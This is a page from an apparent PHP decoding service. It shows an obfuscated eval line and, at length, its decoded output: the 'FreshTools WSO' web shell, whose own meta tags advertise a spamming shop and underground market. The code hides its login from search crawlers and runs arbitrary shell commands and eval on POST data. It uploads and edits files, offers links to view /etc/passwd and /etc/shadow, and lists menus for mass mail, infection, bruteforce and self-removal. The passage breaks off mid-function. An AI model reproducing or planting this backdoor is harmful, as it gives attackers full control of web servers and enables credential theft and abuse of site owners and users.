Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval( str_rot13( gzuncompress( base64_decode( ..
Decoded Output download
$ = '70c2b9976c6d53760e3c3de79f728f3d';
$ = true;
$ = 'UTF-8';
$ = 'FilesMan';
$ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'key', $);
}
if (empty($_POST['charset'])) {
$_POST['charset'] = $;
}
if (!isset($_POST['ne'])) {
if (isset($_POST['a'])) {
$_POST['a'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['a'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['c'])) {
$_POST['c'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['c'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p1'])) {
$_POST['p1'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p1'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p2'])) {
$_POST['p2'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p2'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p3'])) {
$_POST['p3'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p3'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
}
function decrypt($str, $pwd)
{
$pwd = base64_encode($pwd);
$str = base64_decode($str);
$enc_chr = '';
$enc_str = '';
$i = 0;
while ($i < strlen($str)) {
for ($j = 0; $j < strlen($pwd); $j++) {
$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
$enc_str .= $enc_chr;
$i++;
if ($i >= strlen($str)) {
break;
}
}
}
return base64_decode($enc_str);
}
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@define('VERSION', '1.0');
/* () 11.2011 oRb */
if (!empty($)) {
if (isset($_POST['pass']) && md5($_POST['pass']) == $) {
prototype(md5($_SERVER['HTTP_HOST']), $);
}
if (
!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) ||
$_COOKIE[md5($_SERVER['HTTP_HOST'])] != $
) {
hardLogin();
}
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) {
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $;
}
function hardLogin()
{
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = [
'Google',
'Slurp',
'MSNBot',
'ia_archiver',
'Yandex',
'Rambler',
];
if (
preg_match(
'/' . implode('|', $userAgents) . '/i',
$_SERVER['HTTP_USER_AGENT']
)
) {
header('HTTP/1.0 404 Not Found');
exit();
}
}
die(
"<html><head>
<meta name='description' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='keywords' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='author' content='FreshTools'>
<meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST['charset'] .
"'><title>" .
$_SERVER['HTTP_HOST'] .
' freshtools wso ' .
VERSION .
"</title> </head><body><div style='background-color: #040d14;
background-image: url(https://www.transparenttextures.com/patterns/gradient-squares.png);
position: absolute;
height: 100%;
width: 100%;
top: 0;
bottom: 0;
left: 0;
right: 0;
display: flex;
justify-content: center;'><pre align=center><form method=post><p style='font-size: 18px;
color: #fff;
font-weight: bold;
'>Password</p><input type=password name=pass style='margin-right: 0px;
color: #fff;
background-color: #202832;
border: none;
font: 9pt Courier New;
outline: none;
height: 31px;
border-radius: 12px;
width:200px;
margin-right: 6px;outline:none;' required><input type=submit name='mypass' value='submit' style='border:none;background-color:#margin-right: 0px;
color: #fff;
background-color: #202832;
border: none;
font: 9pt Courier New;
outline: none;
height: 31px;
border-radius: 12px;
margin-right: 6px;;color:#fff;cursor:pointer;'></form></pre></div></body></html>"
);
}
if (strtolower(substr(PHP_OS, 0, 3)) == 'win') {
$os = 'win';
} else {
$os = 'nix';
}
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) {
error_reporting(0);
}
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) {
@chdir($_POST['c']);
}
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace('\', '/', $home_cwd);
$cwd = str_replace('\', '/', $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
$cwd .= '/';
}
/* () 04.2015 Pirat */
function hardHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS[''];
}
echo "<html><head>
<meta name='description' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='keywords' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='author' content='FreshTools'>
<meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST['charset'] .
"'><title>" .
$_SERVER['HTTP_HOST'] .
' freshtools wso ' .
VERSION .
"</title>
<style>
body { background: rgb(250,250,250);
background: linear-gradient(180deg, rgba(250,250,250,1) 27%, rgba(251,233,231,0.9009804605435925) 100%); height:100% }
#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
table.info {color:#757575;}
span,h1,a {color:#616161 !important;}
span {font-weight:bolder;}
h1 {border-left:20px solid #E91E63;border-bottom-left-radius:8px;border-top-left-radius:8px;padding:2px 5px;font:14pt Verdana;margin-left:5px;margin-top:8px;margin-bottom:8px}
div.content {padding: 10px;
margin: 15px;
box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;
background:#fff;
border-radius: 8px;}
a {text-decoration:none;}
a:hover {text-decoration:underline;}
.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
.tooltip:hover::after {opacity:1;visibility:visible;}
.ml1 {border: 3px solid #FFF3E0;
background: #FFF8E1;
padding: 10px;
margin: 3px;
overflow: auto;
background: rgba();
color: #424242;
border-radius: 6px;}
.bigarea {min-width:100%;max-width:100%;height:400px; height: 31px;}
input, textarea , select {margin: 0;
margin-right: 0px;
border-radius: 12px;
margin-right: 6px;
height: calc(1.6em + 0.75rem + 2px);
padding: 0.375rem 0.75rem;
font-size: 0.9rem;
font-weight: 400;
line-height: 1.6;
color: #495057;
background-color: #fff;
label::before {
display:none;
}
label::after {
display:none;
}
background-clip: padding-box;
border: 1px solid #ced4da;
border-radius: 0.25rem;
transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
label {position:relative}
form {margin:0px;}
#toolsTbl {text-align:center;}
#fak {background:none;}
#fak td {padding:5px 0 0 0;}
iframe {border:1px solid #060a10;}
.toolsInp {width:300px}
.main th {text-align: left;
font-weight: bold;
font-size: 16px;
color: #B0BEC5 !important;}
.main th a{
color:#B0BEC5!important;
}
.main tr:hover{background-color:#FBE9E7; cursor: pointer;
}
.main td, th{vertical-align:middle;}
input[type='submit'] , input[type='button']{
background: #EC407A; /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #EC407A, #E91E63); /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #EC407A, #E91E63); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
text-align: center;
transition: 0.5s;
background-size: 200% auto;
color: white !important;
border-radius: 10px;
border: none;
box-shadow: none;
}
input[type='submit']:hover , input[type='button']:hover {
background-position: right center; /* change the direction of the change here */
color: #fff;
text-decoration: none;
cursor: pointer;
}
.l1 {background-color:#EEEEEE;}
pre {font:9pt Courier New;}
.menu-header{
background: #fff;
height: 49px;
display: flex;
align-items: center;
justify-content: center;
box-shadow: rgba(149, 157, 165, 0.2) 0px 8px 24px;
margin-top:8px;
margin-bottom:8px;
}
.menu-header table{
height:40px;
}
.content table tr{
height:23px;
color:#616161
}
.send_mail_form input[type='text']{
width:40%;
}
.send_mail_form textarea{
width:40%;
height:120px;
}
.tab-item{
padding: 7px;
width: 106px;
margin-left: 23px;
background: #56ab2f; /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #56ab2f, #a8e063); /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #56ab2f, #a8e063); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
padding: 9px;
text-align: center;
transition: 0.5s;
background-size: 200% auto;
color: white !important;
border-radius: 10px;
border: none;
box-shadow: none;
}
.tab-item:hover{
background-position: right center; /* change the direction of the change here */
color: #fff;
text-decoration: none;
cursor: pointer;
}
.badge-info {
background: #E0E0E0;
color: #616161 !important;
padding: 5px;
border-radius: 15px;
}
.output-result{
padding: 10px;
margin: 3px;
overflow: auto;
border-radius:5px;
margin-top:10px;
margin-bottom:20px;
min-height:50px;
border: 3px solid #FFF3E0;
background: #FFF8E1;
}
</style>
<script>
var c_ = '" .
htmlspecialchars($GLOBALS['cwd']) .
"';
var a_ = '" .
htmlspecialchars(@$_POST['a']) .
"'
var charset_ = '" .
htmlspecialchars(@$_POST['charset']) .
"';
var p1_ = '" .
(strpos(@$_POST['p1'], "
") !== false
? ''
: htmlspecialchars($_POST['p1'], ENT_QUOTES)) .
"';
var p2_ = '" .
(strpos(@$_POST['p2'], "
") !== false
? ''
: htmlspecialchars($_POST['p2'], ENT_QUOTES)) .
"';
var p3_ = '" .
(strpos(@$_POST['p3'], "
") !== false
? ''
: htmlspecialchars($_POST['p3'], ENT_QUOTES)) .
"';
var d = document;
function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
d.mf.a.value = encrypt(d.mf.a.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.c.value = encrypt(d.mf.c.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p1.value = encrypt(d.mf.p1.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p2.value = encrypt(d.mf.p2.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p3.value = encrypt(d.mf.p3.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" .
addslashes($_SERVER['REQUEST_URI']) .
"', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink =
'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
if (strpos('Linux', $kernel) !== false) {
$explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
} else {
$explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = '?';
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode('/', $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . '/</a>';
}
$charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'];
$opt_charsets = '';
foreach ($charsets as $) {
$opt_charsets .=
'<option value="' .
$ .
'" ' .
($_POST['charset'] == $ ? 'selected' : '') .
'>' .
$ .
'</option>';
}
$m = [
'Sec. Info' => 'SecInfo',
'Files' => 'FilesMan',
'Send mail' => 'SendMail',
'Console' => 'Console',
'Infect' => 'Infect',
'Sql' => 'Sql',
'Php' => 'Php',
'Safe mode' => 'SafeMode',
'String tools' => 'StringTools',
'Bruteforce' => 'Bruteforce',
'Network' => 'Network',
];
if (!empty($GLOBALS[''])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) {
$menu .=
'<button class="tab-item" onclick="g(\'' .
$v .
'\',null,\'\',\'\',\'\')">' .
$k .
'</button>';
}
$drives = '';
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':\')) {
$drives .=
'<a href="#" onclick="g(\'FilesMan\',\'' .
$drive .
':/\')">[ ' .
$drive .
' ]</a> ';
}
}
}
/* () 08.2015 dmkcv */
echo '<table class="info" cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' .
($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') .
'</span></td>' .
'<td><nobr>' .
substr(@php_uname(), 0, 120) .
' <a href="http://noreferer.de/?http://www.google.com/search?q=' .
urlencode(@php_uname()) .
'" target="_blank">[ Google ]</a> <a href="' .
$explink .
'" target=_blank>[ Exploit-DB ]</a></nobr><br>' .
$uid .
' ( ' .
$user .
' ) <span>Group:</span> ' .
$gid .
' ( ' .
$group .
' )<br>' .
@phpversion() .
' <span>Safe mode:</span> ' .
($GLOBALS['safe_mode']
? '<font color=red>ON</font>'
: '<font color=#FFDB5F><b>OFF</b></font>') .
' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' .
date('Y-m-d H:i:s') .
'<br>' .
viewSize($totalSpace) .
' <span>Free:</span> ' .
viewSize($freeSpace) .
' (' .
round(100 / ($totalSpace / $freeSpace), 2) .
'%)<br>' .
$cwd_links .
' ' .
viewPermsColor($GLOBALS['cwd']) .
' <a href=# onclick="g(\'FilesMan\',\'' .
$GLOBALS['home_cwd'] .
'\',\'\',\'\',\'\')">[ home ]</a><br>' .
$drives .
'</td>' .
'<td><h1 style="border:none">Freshtools</h1></td>' .
'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">' .
$opt_charsets .
'</select></label><br><span>Server IP:</span><br>' .
gethostbyname($_SERVER['HTTP_HOST']) .
'<br><span>Client IP:</span><br>' .
$_SERVER['REMOTE_ADDR'] .
'</nobr></td></tr></table>' .
'<div class="menu-header">' .
$menu .
'</div><div>';
}
function hardFooter()
{
$is_writable = is_writable($GLOBALS['cwd'])
? " <font color='#FFDB5F'>[ Writeable ]</font>"
: ' <font color=red>(Not writable)</font>';
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
<tr>
<td><form onsubmit=\"" .
(function_exists('actionFilesMan') ? "g(null,this.c.value,'');" : '') .
"return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'><input type=submit value='submit'></form></td>
<td><form onsubmit=\"" .
(function_exists('actionFilesTools')
? "g('FilesTools',null,this.f.value);"
: '') .
"return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
</tr><tr>
<td><form onsubmit=\"" .
(function_exists('actionFilesMan')
? "g('FilesMan',null,'mkdir',this.d.value);"
: '') .
"return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
<td><form onsubmit=\"" .
(function_exists('actionFilesTools')
? "g('FilesTools',null,this.f.value,'mkfile');"
: '') .
"return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
</tr><tr>
<td><form onsubmit=\"" .
(function_exists('actionConsole')
? "g('Console',null,this.c.value);"
: '') .
"return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
<td><form method='post' " .
(!function_exists('actionFilesMan')
? " onsubmit=\"return false;\" "
: '') .
"ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=ne value=''>
<input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '') .
"'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='submit'></form><br ></td>
</tr></table></div>
</body></html>";
}
if (
!function_exists('posix_getpwuid') &&
strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false
) {
function posix_getpwuid($p)
{
return false;
}
}
if (
!function_exists('posix_getgrgid') &&
strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false
) {
function posix_getgrgid($p)
{
return false;
}
}
function ex($in)
{
$ = '';
if (function_exists('exec')) {
@exec($in, $);
$ = @join("
", $);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$ = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$ = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$ = shell_exec($in);
} elseif (is_resource($f = @popen($in, 'r'))) {
$ = '';
while (!@feof($f)) {
$ .= fread($f, 1024);
}
pclose($f);
} else {
return " Unable to execute command
";
}
return $ == '' ? " Query did not return anything
" : $;
}
function viewSize($s)
{
if ($s >= 1073741824) {
return sprintf('%1.2f', $s / 1073741824) . ' GB';
} elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB';
} elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB';
} else {
return $s . ' B';
}
}
function perms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x0100 ? 'r' : '-';
$i .= $p & 0x0080 ? 'w' : '-';
$i .= $p & 0x0040 ? ($p & 0x0800 ? 's' : 'x') : ($p & 0x0800 ? 'S' : '-');
$i .= $p & 0x0020 ? 'r' : '-';
$i .= $p & 0x0010 ? 'w' : '-';
$i .= $p & 0x0008 ? ($p & 0x0400 ? 's' : 'x') : ($p & 0x0400 ? 'S' : '-');
$i .= $p & 0x0004 ? 'r' : '-';
$i .= $p & 0x0002 ? 'w' : '-';
$i .= $p & 0x0001 ? ($p & 0x0200 ? 't' : 'x') : ($p & 0x0200 ? 'T' : '-');
return $i;
}
function viewPermsColor($f)
{
if (!@is_readable($f)) {
return '<font color=#FF0000><b>' .
perms(@fileperms($f)) .
'</b></font>';
} elseif (!@is_writable($f)) {
return '<font ><b>' . perms(@fileperms($f)) . '</b></font>';
} else {
return '<font color=#FFDB5F><b>' .
perms(@fileperms($f)) .
'</b></font>';
}
}
function hardScandir($dir)
{
if (function_exists('scandir')) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function which($p)
{
$path = ex('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function actionRC()
{
if (!@$_POST['p1']) {
$a = [
'uname' => php_uname(),
'php_version' => phpversion(),
'VERSION' => VERSION,
'safemode' => @ini_get('safe_mode'),
];
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
function prototype($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
function actionSecInfo()
{
hardHeader();
echo '<h1>Server security information</h1><div class=content>';
function showSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "
") === false) {
echo $v . '<br>';
} else {
echo '<pre class=ml1>' . $v . '</pre>';
}
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) {
showSecParam(
'Loaded Apache modules',
implode(', ', apache_get_modules())
);
}
showSecParam(
'Disabled PHP Functions',
$GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'
);
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam(
'cURL support',
function_exists('curl_version') ? 'enabled' : 'no'
);
$temp = [];
if (function_exists('mysql_get_client_info')) {
$temp[] = 'MySql (' . mysql_get_client_info() . ')';
}
if (function_exists('mssql_connect')) {
$temp[] = 'MSSQL';
}
if (function_exists('pg_connect')) {
$temp[] = 'PostgreSQL';
}
if (function_exists('oci_connect')) {
$temp[] = 'Oracle';
}
showSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if ($GLOBALS['os'] == 'nix') {
showSecParam(
'Readable /etc/passwd',
@is_readable('/etc/passwd')
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>"
: 'no'
);
showSecParam(
'Readable /etc/shadow',
@is_readable('/etc/shadow')
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>"
: 'no'
);
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
$userful = [
'gcc',
'lcc',
'cc',
'ld',
'make',
'php',
'perl',
'python',
'ruby',
'tar',
'gzip',
'bzip',
'bzip2',
'nc',
'locate',
'suidperl',
];
$danger = [
'kav',
'nod32',
'bdcored',
'uvscan',
'sav',
'drwebd',
'clamd',
'rkhunter',
'chkrootkit',
'iptables',
'ipfw',
'tripwire',
'shieldcc',
'portsentry',
'snort',
'ossec',
'lidsadm',
'tcplodg',
'sxid',
'logcheck',
'logwatch',
'sysmask',
'zmbscap',
'sawmill',
'wormscan',
'ninja',
];
$downloaders = [
'wget',
'fetch',
'lynx',
'links',
'curl',
'get',
'lwp-mirror',
];
echo '<br>';
$temp = [];
foreach ($userful as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Userful', implode(', ', $temp));
$temp = [];
foreach ($danger as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Danger', implode(', ', $temp));
$temp = [];
foreach ($downloaders as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Downloaders', implode(', ', $temp));
echo '<br/>';
showSecParam('HDD space', ex('df -h'));
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version', ex('ver'));
showSecParam(
'Account Settings',
iconv('CP866', 'UTF-8', ex('net accounts'))
);
showSecParam('User Accounts', iconv('CP866', 'UTF-8', ex('net user')));
}
echo '</div>';
hardFooter();
}
function actionFilesTools()
{
if (isset($_POST['p1'])) {
$_POST['p1'] = urldecode($_POST['p1']);
}
if (@$_POST['p2'] == 'download') {
if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start('ob_gzhandler', 4096);
header(
'Content-Disposition: attachment; filename=' .
basename($_POST['p1'])
);
if (function_exists('mime_content_type')) {
$type = @mime_content_type($_POST['p1']);
header('Content-Type: ' . $type);
} else {
header('Content-Type: application/octet-stream');
}
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
}
exit();
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = 'edit';
fclose($fp);
}
}
}
hardHeader();
echo '<h1>File tools</h1><div class=content>';
if (!file_exists(@$_POST['p1'])) {
echo 'File not exists';
hardFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if (!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else {
$gid = @posix_getgrgid(@filegroup($_POST['p1']));
}
echo '<div style="display: block ruby;"><span style="margin-left:8px">Name:</span> ' .
'<span class="badge-info">' .
htmlspecialchars(@basename($_POST['p1'])) .
'</span>' .
'<span style="margin-left:8px">Size:</span> ' .
'<span class="badge-info">' .
(is_file($_POST['p1']) ? viewSize(filesize($_POST['p1'])) : '-') .
'</span>' .
'<span style="margin-left:8px">Permission:</span> ' .
'<span class="badge-info">' .
viewPermsColor($_POST['p1']) .
'</span>' .
'<span style="margin-left:8px">Owner/Group:</span> ' .
'<span class="badge-info">' .
$uid['name'] .
'/' .
$gid['name'] .
'</span></div>' .
'<br>';
echo '<br/><span>Create time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', filectime($_POST['p1'])) .
'</span>' .
' <br/><br/><span>Access time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', fileatime($_POST['p1'])) .
'</span>' .
' <br/><br/><span>Modify time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', filemtime($_POST['p1'])) .
'</span>' .
'<br><br>';
if (empty($_POST['p2'])) {
$_POST['p2'] = 'view';
}
if (is_file($_POST['p1'])) {
$m = [
'View',
'Highlight',
'Download',
'Hexdump',
'Edit',
'Chmod',
'Rename',
'Touch',
'Frame',
];
} else {
$m = ['Chmod', 'Rename', 'Touch'];
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,\'' .
urlencode($_POST['p1']) .
'\',\'' .
strtolower($v) .
'\')">' .
(strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) .
'</a> ';
}
echo '<br><br>';
switch ($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if (@is_readable($_POST['p1'])) {
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$oRb = @highlight_file($_POST['p1'], true);
echo str_replace(
['<span ', '</span>'],
